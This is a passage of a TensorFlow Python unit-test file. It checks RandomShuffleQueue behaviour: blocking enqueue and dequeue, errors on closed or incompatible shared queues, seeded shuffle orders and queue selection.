with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
# While the last dequeue failed, we want to insure that it returns
# any elements that it potentially reserved to dequeue. Thus the
# next cleanup should return a single element.
results.extend(self.evaluate(cleanup_dequeue_t))
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
self.assertEqual(len(results), 4)
def testBlockingDequeueManyFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_many(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testBlockingDequeueUpToFromClosedEmptyQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
close_op = q.close()
dequeued_t = q.dequeue_up_to(4)
def dequeue():
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.OutOfRangeError,
"is closed and has insufficient"):
self.evaluate(dequeued_t)
dequeue_thread = self.checkedThread(target=dequeue)
dequeue_thread.start()
# The close_op should run after the dequeue_thread has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
close_op.run()
dequeue_thread.join()
def testEnqueueToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 4, dtypes_lib.float32)
enqueue_op = q.enqueue((10.0,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testEnqueueManyToClosedQueue(self):
with self.cached_session():
q = data_flow_ops.RandomShuffleQueue(10, 5, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
close_op = q.close()
enqueue_op.run()
close_op.run()
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.CancelledError, "is closed"):
enqueue_op.run()
def testBlockingEnqueueToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0], results)
# There wasn't room for 50.0 in the queue when the first element was
# dequeued.
self.assertNotEqual(50.0, results[0])
thread.join()
def testBlockingEnqueueManyToFullQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
dequeued_t = q.dequeue()
enqueue_op.run()
def blocking_enqueue():
self.evaluate(blocking_enqueue_op)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The dequeue ops should run after the blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
for _ in elems:
time.sleep(0.01)
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
results.append(dequeued_t.eval())
self.assertItemsEqual(elems + [50.0, 60.0], results)
# There wasn't room for 50.0 or 60.0 in the queue when the first
# element was dequeued.
self.assertNotEqual(50.0, results[0])
self.assertNotEqual(60.0, results[0])
# Similarly for 60.0 and the second element.
self.assertNotEqual(60.0, results[1])
thread.join()
def testBlockingEnqueueToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0, 40.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue((50.0,))
dequeued_t = q.dequeue()
close_op = q.close()
enqueue_op.run()
def blocking_enqueue():
# Expect the operation to succeed since it will complete
# before the queue is closed.
self.evaluate(blocking_enqueue_op)
# Expect the operation to fail due to the queue being closed.
with self.assertRaisesRegex(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# The close_op should run after the first blocking_enqueue_op has blocked.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Wait for the close op to block before unblocking the enqueue.
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
results = []
# Dequeue to unblock the first blocking_enqueue_op, after which the
# close will complete.
results.append(dequeued_t.eval())
self.assertTrue(results[0] in elems)
thread2.join()
thread1.join()
def testBlockingEnqueueManyToClosedQueue(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(4, 0, dtypes_lib.float32, ((),))
elems = [10.0, 20.0, 30.0]
enqueue_op = q.enqueue_many((elems,))
blocking_enqueue_op = q.enqueue_many(([50.0, 60.0],))
close_op = q.close()
size_t = q.size()
enqueue_op.run()
self.assertEqual(size_t.eval(), 3)
def blocking_enqueue():
# This will block until the dequeue after the close.
self.evaluate(blocking_enqueue_op)
thread1 = self.checkedThread(target=blocking_enqueue)
thread1.start()
# First blocking_enqueue_op of blocking_enqueue has enqueued 1 of 2
# elements, and is blocked waiting for one more element to be dequeue.
for i in range(50):
queue_size = self.evaluate(size_t)
if queue_size == 4:
break
elif i == 49:
self.fail(
"Blocking enqueue op did not execute within the expected time.")
time.sleep(0.1)
def blocking_close():
self.evaluate(close_op)
thread2 = self.checkedThread(target=blocking_close)
thread2.start()
# Unblock the first blocking_enqueue_op in blocking_enqueue.
q.dequeue().eval()
thread2.join()
thread1.join()
# At this point the close operation will complete, so the next enqueue
# will fail.
with self.assertRaisesRegex(errors_impl.CancelledError, "closed"):
self.evaluate(blocking_enqueue_op)
def testSharedQueueSameSession(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1.enqueue((10.0,)).run()
# TensorFlow TestCase adds a default graph seed (=87654321). We check if
# the seed computed from the default graph seed is reproduced.
seed = 887634792
q2 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=seed)
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q2.dequeue().eval(), 10.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
q2.enqueue((20.0,)).run()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
self.assertEqual(q1.dequeue().eval(), 20.0)
self.assertEqual(q1_size_t.eval(), 0)
self.assertEqual(q2_size_t.eval(), 0)
def testSharedQueueSameSessionGraphSeedNone(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(
1,
0,
dtypes_lib.float32, ((),),
shared_name="shared_queue",
seed=98765432)
q1.enqueue((10.0,)).run()
# If both graph and op seeds are not provided, the default value must be
# used, and in case a shared queue is already created, the second queue op
# must accept any previous seed value.
random_seed.set_random_seed(None)
q2 = data_flow_ops.RandomShuffleQueue(
1, 0, dtypes_lib.float32, ((),), shared_name="shared_queue")
q1_size_t = q1.size()
q2_size_t = q2.size()
self.assertEqual(q1_size_t.eval(), 1)
self.assertEqual(q2_size_t.eval(), 1)
def testIncompatibleSharedQueueErrors(self):
with self.cached_session():
q_a_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_a")
q_a_2 = data_flow_ops.RandomShuffleQueue(
15, 5, dtypes_lib.float32, shared_name="q_a")
q_a_1.queue_ref.op.run()
with self.assertRaisesOpError("capacity"):
q_a_2.queue_ref.op.run()
q_b_1 = data_flow_ops.RandomShuffleQueue(
10, 0, dtypes_lib.float32, shared_name="q_b")
q_b_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_b")
q_b_1.queue_ref.op.run()
with self.assertRaisesOpError("min_after_dequeue"):
q_b_2.queue_ref.op.run()
q_c_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_c")
q_c_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, shared_name="q_c")
q_c_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_c_2.queue_ref.op.run()
q_d_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_d")
q_d_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_d")
q_d_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_d_2.queue_ref.op.run()
q_e_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_e")
q_e_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_e")
q_e_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_e_2.queue_ref.op.run()
q_f_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 3)], shared_name="q_f")
q_f_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shapes=[(1, 1, 2, 4)], shared_name="q_f")
q_f_1.queue_ref.op.run()
with self.assertRaisesOpError("component shapes"):
q_f_2.queue_ref.op.run()
q_g_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, shared_name="q_g")
q_g_2 = data_flow_ops.RandomShuffleQueue(
10, 5, (dtypes_lib.float32, dtypes_lib.int32), shared_name="q_g")
q_g_1.queue_ref.op.run()
with self.assertRaisesOpError("component types"):
q_g_2.queue_ref.op.run()
q_h_1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=12, shared_name="q_h")
q_h_2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.float32, seed=21, shared_name="q_h")
q_h_1.queue_ref.op.run()
with self.assertRaisesOpError("random seeds"):
q_h_2.queue_ref.op.run()
def testSelectQueue(self):
with self.cached_session():
num_queues = 10
qlist = []
for _ in xrange(num_queues):
qlist.append(
data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32))
# Enqueue/Dequeue into a dynamically selected queue
for _ in xrange(20):
index = np.random.randint(num_queues)
q = data_flow_ops.RandomShuffleQueue.from_list(index, qlist)
q.enqueue((10.,)).run()
self.assertEqual(q.dequeue().eval(), 10.0)
def testSelectQueueOutOfRange(self):
with self.cached_session():
q1 = data_flow_ops.RandomShuffleQueue(10, 0, dtypes_lib.float32)
q2 = data_flow_ops.RandomShuffleQueue(15, 0, dtypes_lib.float32)
enq_q = data_flow_ops.RandomShuffleQueue.from_list(3, [q1, q2])
with self.assertRaisesOpError("is not in"):
enq_q.dequeue().eval()
def _blockingDequeue(self, sess, dequeue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_op)
def _blockingDequeueMany(self, sess, dequeue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_many_op)
def _blockingDequeueUpTo(self, sess, dequeue_up_to_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(dequeue_up_to_op)
def _blockingEnqueue(self, sess, enqueue_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_op)
def _blockingEnqueueMany(self, sess, enqueue_many_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(enqueue_many_op)
def testResetOfBlockingOperation(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q_empty = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, (
(),))
dequeue_op = q_empty.dequeue()
dequeue_many_op = q_empty.dequeue_many(1)
dequeue_up_to_op = q_empty.dequeue_up_to(1)
q_full = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.float32, ((),))
sess.run(q_full.enqueue_many(([1.0, 2.0, 3.0, 4.0, 5.0],)))
enqueue_op = q_full.enqueue((6.0,))
enqueue_many_op = q_full.enqueue_many(([6.0],))
threads = [
self.checkedThread(
self._blockingDequeue, args=(sess, dequeue_op)),
self.checkedThread(
self._blockingDequeueMany, args=(sess, dequeue_many_op)),
self.checkedThread(
self._blockingDequeueUpTo, args=(sess, dequeue_up_to_op)),
self.checkedThread(
self._blockingEnqueue, args=(sess, enqueue_op)),
self.checkedThread(
self._blockingEnqueueMany, args=(sess, enqueue_many_op))
]
for t in threads:
t.start()
time.sleep(0.1)
sess.close() # Will cancel the blocked operations.
for t in threads:
t.join()
def testDequeueManyInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_many(5)
deq2 = q2.dequeue_many(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueUpToInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue_up_to(5)
deq2 = q2.dequeue_up_to(5)
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
results[0].extend(deq1.eval())
results[1].extend(deq2.eval())
q1.close().run()
q2.close().run()
results[2].extend(deq1.eval())
results[3].extend(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testDequeueInDifferentOrders(self):
with self.cached_session():
# Specify seeds to make the test deterministic
# (https://en.wikipedia.org/wiki/Taxicab_number).
q1 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=1729)
q2 = data_flow_ops.RandomShuffleQueue(
10, 5, dtypes_lib.int32, ((),), seed=87539319)
enq1 = q1.enqueue_many(([1, 2, 3, 4, 5],))
enq2 = q2.enqueue_many(([1, 2, 3, 4, 5],))
deq1 = q1.dequeue()
deq2 = q2.dequeue()
enq1.run()
enq1.run()
enq2.run()
enq2.run()
results = [[], [], [], []]
for _ in range(5):
results[0].append(deq1.eval())
results[1].append(deq2.eval())
q1.close().run()
q2.close().run()
for _ in range(5):
results[2].append(deq1.eval())
results[3].append(deq2.eval())
# No two should match
for i in range(1, 4):
for j in range(i):
self.assertNotEqual(results[i], results[j])
def testBigEnqueueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(5, 0, dtypes_lib.int32, ((),))
elem = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
enq = q.enqueue_many((elem,))
deq = q.dequeue()
size_op = q.size()
enq_done = []
def blocking_enqueue():
enq_done.append(False)
# This will fill the queue and then block until enough dequeues happen.
self.evaluate(enq)
enq_done.append(True)
thread = self.checkedThread(target=blocking_enqueue)
thread.start()
# The enqueue should start and then block.
results = []
results.append(deq.eval()) # Will only complete after the enqueue starts.
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
for _ in range(3):
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 1)
self.assertEqual(self.evaluate(size_op), 5)
# This dequeue will unblock the thread.
results.append(deq.eval())
time.sleep(0.1)
self.assertEqual(len(enq_done), 2)
thread.join()
for i in range(5):
self.assertEqual(size_op.eval(), 5 - i)
results.append(deq.eval())
self.assertEqual(size_op.eval(), 5 - i - 1)
self.assertItemsEqual(elem, results)
def testBigDequeueMany(self):
with self.cached_session() as sess:
q = data_flow_ops.RandomShuffleQueue(2, 0, dtypes_lib.int32, ((),))
elem = np.arange(4, dtype=np.int32)
enq_list = [q.enqueue((e,)) for e in elem]
deq = q.dequeue_many(4)
results = []
def blocking_dequeue():
# Will only complete after 4 enqueues complete.
results.extend(self.evaluate(deq))
thread = self.checkedThread(target=blocking_dequeue)
thread.start()
# The dequeue should start and then block.
for enq in enq_list:
# TODO(mrry): Figure out how to do this without sleeping.
time.sleep(0.1)
self.assertEqual(len(results), 0)
self.evaluate(enq)
# Enough enqueued to unblock the dequeue
thread.join()
self.assertItemsEqual(elem, results)
if __name__ == "__main__":
test.main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.